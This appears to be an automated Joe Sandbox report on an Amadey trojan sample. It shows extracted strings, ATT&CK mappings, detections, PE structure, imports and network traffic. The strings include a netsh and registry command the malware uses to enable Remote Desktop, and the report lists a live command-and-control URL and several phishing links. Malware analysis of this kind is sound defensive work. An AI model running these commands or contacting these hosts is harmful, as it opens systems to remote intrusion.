setef593705fac41080913cacb53465d610c33e9ad058e5d380869687d885c0668cc5a4ec860f68b736482525c28f5090edd334fc27rnRSUUh2Xr4bi9XNEwc4ep4V9m2Rvle2Gs4Yyt4XLVPMF=P7zu3OYjgmTe5r2l9xs=RXYvEc==YDUj4DJnNXVq6M==PXPq6M==2YevEP3dSDjaP6==V8bY6TKnQmXXPF==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQoWXV93V==Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaNTCfhiDM1vSh stIb4yeRQEtY8Lf5jGVhA==YrPr27ViAyYxNFLGHtiHGs1BL5FaY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467MgQogsPsRCmmRzK YMDtRZybgXO=Y53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8HaIZKshmXn4uWaadFrb467JQcqeBZn32DaMY7fgGy Hb6hXwNAcy==N0PRJRyKZkazIJuuHG==1Jzu5w==YJ3RNw==V5PSe1K4hsG4g7K4f8G42re422C4gLG4h1Y43LU422S4fMS4f774goU=28DjRyUegGz1ORueasXmbIy228DjRyUegGy=27rn5yUegGy=3Iy=3Yy=3YC=3YG=X1zn4c==eMLY5zdpQw==eMLY5DB0Qy =32bj3Lrq27VigMGvf2HnirfuP8zZ3SKUTLG+TLK+P6vq6S3jgnOoODmpMB==jF==NsPs3TF3TV==g7bj4CltRi7d2vt=e7Pw4iKmRzKnPvuhV7PYLiuUfX1eKSiobwNvSY6g4p==YMDtRZybgUTa4vC2U0TzMXFaZ2af4wa7acM=U2Tn5it=W7zx5CKsh2vYytu7W7==V0HDNw==YLzsRCtaZ2Xc4MGebxc=VL3h6CYsNFfeO6==U0TFQESuNCYU3WzMPLKQacd2eS==UrfYRCKg4W7dPMF=Xr3w6CYoY73u3CYtU73r4YGpZ7fsJCKg4W7dPMF=QIywEvFVSjeXEF==grC=h7C=U73s6CKoiC3N5MyaM9tvdYyU3QwbfiGk3r3w4OQe3XTaEny8 TNwZIGs7MVnONQiPXUrDOPnHVjB4YUU4W7TBJOeaTtxc4mU3P4oRdrbf8DrDSGbiGG0yv27 MMaIoSb6zzcRtrbe1rj4iun4T2bMlUIIYYoiGXn4rYJcNtnOkCb5AwmdRD7hLft4eYp33Te4rYobxBnYY1Hu VEHVirDOPnQS2=PXULuc==T8Hh5fPrPrjuRs==U73s6CKoiC3N5MyaM9tjcJCm3PIbgBbkfn32DT3Xiy3f2SGiJNNAbIWoQV4e2RG=Y6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6GR6iaxN2ZZKIQPWf0zDkf2vZ6CKsYmHmPF==U73r5DKU4XLHOLYa21DhRCKg42ji1bqh MXxcJGs5WMVgi4Ti2iuEPxtSDWVDodUJL0=P2Ps3SCp4GWmY6fRNAKH2EPU3cGa dJFb46U5f4mXXLP1JHt4jGsg2z6LL2ebwNmVomeRP47TVZDZKDNLBmQXUTyJQt=Y6fRNAKH2EPo2cOn SpVZZRqEwA7XXLnhrfhRTC7VmHs1LKt9NFybIGZPyUj2BLkZrfiRSYDWA==1IuuEzp=VLPkQTKmiFPe4wOe c6BLniMRQIpeCLPe13sVLPkQTKmiFPe4wOe c6BLnmMRQIpeCLPe13sY53ENB3vZkX6JLi9ac1Bb40UPy9jehHkh8GeLhG7V3Xr3bSjbvRncpOj4VZ=YMDtRDKdiE7a2LR=QouvGM==QouwEc==QouvFc==QouwFM==U8Pw5iKoiELU1Lu 1F==Soi4gsPsRCmmRzKnPMeaP7meMsLf5YilfWzlyr6bGs1rbUBcMnukBeqUfW3e2SSPGtwiJkZaRzQmLv==NnSeJT7jiCK=MnukBeqs4W6 MHSkAw==YL31RTytfGXl2r2acwM=P1P2RSCViGno2cyk wdleUCsRPWpgBLoe18sRSFaQU1i2vR6G7==Ml==g7bZ6CGpi26 BMJ6JNIiMC==g8K75s==grzsRCYnW7P3QiYbhmS JvCU TN2XHCsRPsp1RG=QIuuEzpURTm=QIuuEzpURjK=QIuuEzpURjO=QIuuEzpUR20=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          1
          Process Injection
          21
          Virtualization/Sandbox Evasion
          OS Credential Dumping2
          System Time Discovery
          1
          Remote Desktop Protocol
          1
          Screen Capture
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Process Injection
          LSASS Memory21
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account Manager21
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
          Obfuscated Files or Information
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets1
          Account Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
          System Owner/User Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          File and Directory Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem34
          System Information Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          6uHfmjGMfL.exe56%VirustotalBrowse
          6uHfmjGMfL.exe63%ReversingLabsWin32.Trojan.Amadey
          6uHfmjGMfL.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://clientservices.sgoogleapis.observer/api/index.phpserver0%Avira URL Cloudsafe
          http://clientservices.sgoogleapis.observer/api/index.php0%Avira URL Cloudsafe
          http://clientservices.sgoogleapis.observer/api/index.php6o0%Avira URL Cloudsafe
          clientservices.sgoogleapis.observer/api/index.php0%Avira URL Cloudsafe
          http://clientservices.sgoogleapis.observer/api/index.php80%Avira URL Cloudsafe
          http://clientservices.sgoogleapis.observer/api/index.php$$clientservices.sgoogleapis.observer0%Avira URL Cloudsafe
          http://clientservices.sgoogleapis.observer/api/index.phpK0%Avira URL Cloudsafe
          http://clientservices.sgoogleapis.observer/api/index.php;0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          clientservices.sgoogleapis.observer
          104.21.80.1
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://clientservices.sgoogleapis.observer/api/index.phptrue
            • Avira URL Cloud: safe
            unknown
            clientservices.sgoogleapis.observer/api/index.phptrue
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://clientservices.sgoogleapis.observer/api/index.php;6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://clientservices.sgoogleapis.observer/api/index.phpK6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://clientservices.sgoogleapis.observer/api/index.phpk6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://clientservices.sgoogleapis.observer/api/index.php86uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://clientservices.sgoogleapis.observer/api/index.php6o6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013D5000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://clientservices.sgoogleapis.observer/api/index.php$$clientservices.sgoogleapis.observer6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://clientservices.sgoogleapis.observer/api/index.phpserver6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013D5000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              104.21.80.1
              clientservices.sgoogleapis.observerUnited States
              13335CLOUDFLARENETUStrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1585768
              Start date and time:2025-01-08 08:43:06 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 19s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:4
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:6uHfmjGMfL.exe
              renamed because original name is a hash value
              Original Sample Name:89796a9b6072d2334db09c8b41a64c57.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 19
              • Number of non-executed functions: 93
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45, 52.149.20.212
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              02:43:54API Interceptor9399623x Sleep call for process: 6uHfmjGMfL.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.21.80.1http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
              • my.cradaygo.com/smmylet
              SW_48912.scr.exeGet hashmaliciousFormBookBrowse
              • www.dejikenkyu.cyou/pmpa/
              SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
              • hiranetwork.com/administrator/index.php
              downloader2.htaGet hashmaliciousXWormBrowse
              • 2k8u3.org/wininit.exe
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUShttps://mitra-led.com/Get hashmaliciousUnknownBrowse
              • 104.21.96.1
              YOUR TV LICENCE STATEMENT.pdfGet hashmaliciousHTMLPhisherBrowse
              • 104.17.25.14
              https://www.flamingoblv.com/bdAHAKrXFqXFQCYuPG6x8vSTVrU9FI7svGtQIOtbZGb5Zz82nKKGDoG-o7UnwphbBQK1zePMgTPfELKVecsIqQ~~Get hashmaliciousUnknownBrowse
              • 172.67.160.100
              https://www.overflix.gay/ksisjepGet hashmaliciousUnknownBrowse
              • 104.21.76.17
              Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
              • 188.114.97.3
              3.elfGet hashmaliciousUnknownBrowse
              • 1.4.26.56
              https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=evsqlwgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#test@kghm.comGet hashmaliciousUnknownBrowse
              • 1.1.1.1
              http://plnbl.io/review/VdCYQSoKp54zGet hashmaliciousHTMLPhisherBrowse
              • 104.22.54.104
              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
              • 104.21.36.11
              https://www.google.com/url?q=YG2GERTSbxgfeaGh1Yi5pby8yODY0MDkxOTEyNjI3MjNkMzQzMGNlYjE1ZTRjZjNlZWUwMTM5NGMyMDk3MmRmYTllZTBkMzUzMDBlZDFjOWNjMjdhNWZiYmM0OTU1ODkzMjEyMjI5MjAwOTkviinbsewtyuas53D1e4a0cefd8db4ad28e54c10117f7d498%2526i%253DNjI2YjE3MTBiZWI4YTgxMWUwNDIxNzE3%2526p%253Dm%2526s%253DAVNPUEhUT0NFTkNSWVBUSVYmhcLGCIsQzpMqHgYCBBo2kwEPWKEfFaahaLsnpofO4A%2526t%253DM3dHV0ZCT2t4azAvRVhKQ3B1ZC95RFFTdmpSMCt3cEFxWHJocUMzM0EyZz0%25253D%2526u%253DaHR0cHM6Ly9tLmV4YWN0YWcuY29tL2NsLmFzcHg_ZXh0UHJvdkFwaT1zaXh0L&sa=t&url=amp%2Fdlocumndjkacheckckoqingnmlcsoftlineon-secure-portal.us-iad-10.linodeobjects.com/newdocusign.html#Tdcjoiletuzn43fqnlhtwn8dbfakjhsdbfjhasbdfkjasbdkf%20ashjdbaksdbfkjasbdbfadGet hashmaliciousUnknownBrowse
              • 104.18.95.41
              No context
              No context
              No created / dropped files found
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.473090379332284
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:6uHfmjGMfL.exe
              File size:444'928 bytes
              MD5:89796a9b6072d2334db09c8b41a64c57
              SHA1:bb0e78329ec39982aa2b3b4064375a534170aa43
              SHA256:c847c70bdc3eecede3b89f4d7c88ad538271ea92fcfc3e6bb2ea6e22b83d4d61
              SHA512:22469f8af6b39e08f12ce243b5114ade233dc68bb6aea126ced1b4d1d419c5923f37426c5fe436f66c086c4fce088aa7b9f83613a4bfcda06cf6ffe5920f59dd
              SSDEEP:12288:l6BzKWxAlmQVUhMbQiLlh1FPMdkU9rTXl0ux:jlmLQpBM+Uz3x
              TLSH:C5944B207917D032D52191B11FADFFF195ADB9269B710ADB7BC00E366A201E36A31F39
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........BS..,...,...,.../...,...).#.,...(...,.../...,...)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,........
              Icon Hash:00928e8e8686b000
              Entrypoint:0x42a107
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x5E944E30 [Mon Apr 13 11:34:08 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:407b29a1346b818a12b66f58555063ce
              Instruction
              call 00007FE7D4DA8B9Bh
              jmp 00007FE7D4DA83C9h
              mov ecx, dword ptr [ebp-0Ch]
              mov dword ptr fs:[00000000h], ecx
              pop ecx
              pop edi
              pop edi
              pop esi
              pop ebx
              mov esp, ebp
              pop ebp
              push ecx
              ret
              mov ecx, dword ptr [ebp-10h]
              xor ecx, ebp
              call 00007FE7D4DA7C36h
              jmp 00007FE7D4DA8532h
              push eax
              push dword ptr fs:[00000000h]
              lea eax, dword ptr [esp+0Ch]
              sub esp, dword ptr [esp+0Ch]
              push ebx
              push esi
              push edi
              mov dword ptr [eax], ebp
              mov ebp, eax
              mov eax, dword ptr [00466124h]
              xor eax, ebp
              push eax
              push dword ptr [ebp-04h]
              mov dword ptr [ebp-04h], FFFFFFFFh
              lea eax, dword ptr [ebp-0Ch]
              mov dword ptr fs:[00000000h], eax
              ret
              push eax
              push dword ptr fs:[00000000h]
              lea eax, dword ptr [esp+0Ch]
              sub esp, dword ptr [esp+0Ch]
              push ebx
              push esi
              push edi
              mov dword ptr [eax], ebp
              mov ebp, eax
              mov eax, dword ptr [00466124h]
              xor eax, ebp
              push eax
              mov dword ptr [ebp-10h], eax
              push dword ptr [ebp-04h]
              mov dword ptr [ebp-04h], FFFFFFFFh
              lea eax, dword ptr [ebp-0Ch]
              mov dword ptr fs:[00000000h], eax
              ret
              push eax
              push dword ptr fs:[00000000h]
              lea eax, dword ptr [esp+0Ch]
              sub esp, dword ptr [esp+0Ch]
              push ebx
              push esi
              push edi
              mov dword ptr [eax], ebp
              mov ebp, eax
              mov eax, dword ptr [00466124h]
              xor eax, ebp
              push eax
              mov dword ptr [ebp-10h], esp
              push dword ptr [ebp-04h]
              mov dword ptr [ebp-04h], FFFFFFFFh
              lea eax, dword ptr [ebp-0Ch]
              mov dword ptr fs:[00000000h], eax
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x645800xc8.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x1e0.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e0000x45c8.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x5e1ec0x38.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x5e3000x18.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5e2280x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x510000x33c.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x4f23a0x4f4003f586b812b415068f12e112d05eb0bf5False0.47701843454258674data6.518721209760155IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x510000x148900x14a00e2fabb6dad8685ca5173f7adf297e02cFalse0.4822679924242424data5.329370107979886IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x660000x6ddc0x2c00722b6870b0cee64fdefc234f5adaca0bFalse0.14923650568181818data3.3090615649832866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x6d0000x1e00x2004a05bbd64487346fb2d65a9ea12c5f5eFalse0.53125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x6e0000x45c80x4600fdf114b854bd3eb1290026b9dc2a7280False0.7024553571428571data6.628631376053393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              sqaf0x730000x20000x1400170fe67a5900a37ccfc06b15c468cbb3False0.386328125Targa image data - Map 32512 x 4096 x 32 +32352 +4096 - 15-bit alpha - top - right - interleave ""4.281713625079622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_MANIFEST0x6d0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
              DLLImport
              KERNEL32.dllGetFileAttributesA, Process32NextW, CreateFileA, Process32FirstW, CloseHandle, GetSystemInfo, CreateThread, GetThreadContext, GetProcAddress, GetLastError, RemoveDirectoryA, ReadProcessMemory, CreateProcessA, CreateDirectoryA, SetThreadContext, SetEndOfFile, HeapSize, GetProcessHeap, SetEnvironmentVariableW, Wow64RevertWow64FsRedirection, GetTempPathA, Sleep, CreateToolhelp32Snapshot, OpenProcess, SetCurrentDirectoryA, GetModuleHandleA, ResumeThread, GetComputerNameExW, GetVersionExW, WaitForSingleObject, CreateMutexA, FindClose, PeekNamedPipe, CreatePipe, FindNextFileA, VirtualAlloc, Wow64DisableWow64FsRedirection, WriteFile, VirtualFree, FindFirstFileA, SetHandleInformation, WriteProcessMemory, GetModuleFileNameA, VirtualAllocEx, ReadFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, GetTimeZoneInformation, HeapReAlloc, ReadConsoleW, SetStdHandle, GetFullPathNameW, GetCurrentDirectoryW, DeleteFileW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, HeapAlloc, HeapFree, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, SetFilePointerEx, GetFileSizeEx, GetCommandLineW, GetCommandLineA, GetStdHandle, GetModuleFileNameW, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetFileType, GetFileInformationByHandle, GetDriveTypeW, CreateFileW, RaiseException, GetCurrentThreadId, IsProcessorFeaturePresent, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, InitializeConditionVariable, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableCS, SleepConditionVariableSRW, InitOnceComplete, InitOnceBeginInitialize, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, TryEnterCriticalSection, DeleteCriticalSection, WaitForSingleObjectEx, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, CreateEventW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, WriteConsoleW
              USER32.dllGetSystemMetrics, ReleaseDC, GetDC
              GDI32.dllCreateCompatibleBitmap, SelectObject, CreateCompatibleDC, DeleteObject, BitBlt
              ADVAPI32.dllRevertToSelf, RegCloseKey, RegQueryInfoKeyW, RegGetValueA, RegQueryValueExA, GetSidSubAuthorityCount, GetSidSubAuthority, GetUserNameA, CreateProcessWithTokenW, LookupAccountNameA, ImpersonateLoggedOnUser, RegSetValueExA, OpenProcessToken, RegOpenKeyExA, RegEnumValueA, DuplicateTokenEx, GetSidIdentifierAuthority
              SHELL32.dllSHGetFolderPathA, ShellExecuteA, SHFileOperationA
              ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
              WININET.dllHttpOpenRequestA, InternetWriteFile, InternetOpenUrlA, InternetOpenW, HttpEndRequestW, HttpAddRequestHeadersA, HttpSendRequestExA, InternetOpenA, InternetCloseHandle, HttpSendRequestA, InternetConnectA, InternetReadFile
              gdiplus.dllGdiplusStartup, GdipSaveImageToFile, GdipGetImageEncodersSize, GdiplusShutdown, GdipGetImageEncoders, GdipCreateBitmapFromHBITMAP, GdipDisposeImage
              WS2_32.dllclosesocket, inet_pton, getaddrinfo, WSAStartup, send, socket, connect, recv, htons, freeaddrinfo
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2025-01-08T08:44:05.634067+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.549708104.21.80.180TCP
              TimestampSource PortDest PortSource IPDest IP
              Jan 8, 2025 08:43:56.085689068 CET4970480192.168.2.5104.21.80.1
              Jan 8, 2025 08:43:56.090498924 CET8049704104.21.80.1192.168.2.5
              Jan 8, 2025 08:43:56.090567112 CET4970480192.168.2.5104.21.80.1
              Jan 8, 2025 08:43:56.091411114 CET4970480192.168.2.5104.21.80.1
              Jan 8, 2025 08:43:56.096227884 CET8049704104.21.80.1192.168.2.5
              Jan 8, 2025 08:43:56.733007908 CET8049704104.21.80.1192.168.2.5
              Jan 8, 2025 08:43:56.733072996 CET4970480192.168.2.5104.21.80.1
              Jan 8, 2025 08:43:58.241086960 CET4970480192.168.2.5104.21.80.1
              Jan 8, 2025 08:43:58.241303921 CET4970580192.168.2.5104.21.80.1
              Jan 8, 2025 08:43:58.246130943 CET8049705104.21.80.1192.168.2.5
              Jan 8, 2025 08:43:58.246148109 CET8049704104.21.80.1192.168.2.5
              Jan 8, 2025 08:43:58.246248960 CET4970480192.168.2.5104.21.80.1
              Jan 8, 2025 08:43:58.246257067 CET4970580192.168.2.5104.21.80.1
              Jan 8, 2025 08:43:58.246392965 CET4970580192.168.2.5104.21.80.1
              Jan 8, 2025 08:43:58.251651049 CET8049705104.21.80.1192.168.2.5
              Jan 8, 2025 08:43:58.904522896 CET8049705104.21.80.1192.168.2.5
              Jan 8, 2025 08:43:58.904629946 CET4970580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:00.522114992 CET4970580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:00.522384882 CET4970680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:00.527189016 CET8049706104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:00.527219057 CET8049705104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:00.527333021 CET4970580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:00.527374029 CET4970680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:00.527575016 CET4970680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:00.532377005 CET8049706104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:01.172691107 CET8049706104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:01.172768116 CET4970680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:02.678423882 CET4970680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:02.678627014 CET4970780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:02.683464050 CET8049707104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:02.683507919 CET8049706104.21.80.1192.168.2.5
